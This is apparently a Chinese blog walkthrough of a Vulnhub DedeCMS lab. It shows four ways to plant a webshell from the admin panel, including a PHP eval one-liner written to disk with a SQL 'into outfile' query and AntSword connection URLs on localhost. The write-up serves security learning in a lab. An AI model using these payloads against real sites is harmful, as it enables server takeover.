当前位置: 首页 > news >正文

Vulnhub-dedecms织梦通关攻略

        姿势一、通过文件管理器上传WebShell

        第一步:进入后台,找到文件管理器上传木马文件

        第二步:使用蚁剑进行连接

#文件地址
http://localhost/dedecms/shell.php

        

        姿势二、修改模板⽂件拿WebShell

        第一步:修改模板文件,删除主页index.htm中原有内容,写入一句话木马

        第二步:更新主页html为index.php

        第三步:使用蚁剑进行连接

http://localhost/dedecms/dede/../index.php

        姿势三、后台任意命令执⾏拿WebShell

        第一步:增加一条广告,内容为一句话木马

        第二步:点击【代码】,将图中显示的路径与站点进⾏拼接....访问测试

        第三步:使用蚁剑进行连接

http://localhost/dedecms/plus/ad_js.php?aid=1

        姿势四、通过后台sql命令执⾏拿webshell

        第一步:找到系统--sql命令⾏⼯具,执⾏select @@ basedir,得到mysql的路径,由此猜测⽹站绝对路径

        第二步:into outfile写⼊⼀句话木马

select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/webshell.php'
        第三步:使用蚁剑进行连接

                                                                                                                               FROM  IYU_


http://www.mrgr.cn/news/95227.html

相关文章:

  • 【C++网络编程】第2篇:简单的TCP服务器与客户端
  • CIR-Net:用于 RGB-D 显著性目标检测的跨模态交互与优化(问题)
  • vmware下linux无法上网解决方法
  • 啃书—以国产化光耦ORPC-847芯片手册为例
  • 字节大模型面经
  • 单片机flash存储也做磨损均衡
  • 【C#语言】C#中的同步与异步编程:原理、示例与最佳实践
  • RAG各类方法python源码解读与实践:RAG技术综合评测【3万字长文】
  • Redis核心机制(一)
  • C++学习之nginx+fastDFS
  • 从零开始实现Stable Diffusion本地部署
  • DeDeCMS靶场获取wenshell攻略
  • go~协程阻塞分析
  • 大模型在肺源性心脏病预测及治疗方案制定中的应用研究报告
  • [Xilinx]工具篇_PetaLinux自动编译
  • 【问题解决】Postman 测试报错 406
  • vue3+ts项目心得
  • 【VUE】day05-ref引用
  • git tag以及git
  • 基于RAGFlow本地部署DeepSeek-R1大模型与知识库:从配置到应用的全流程解析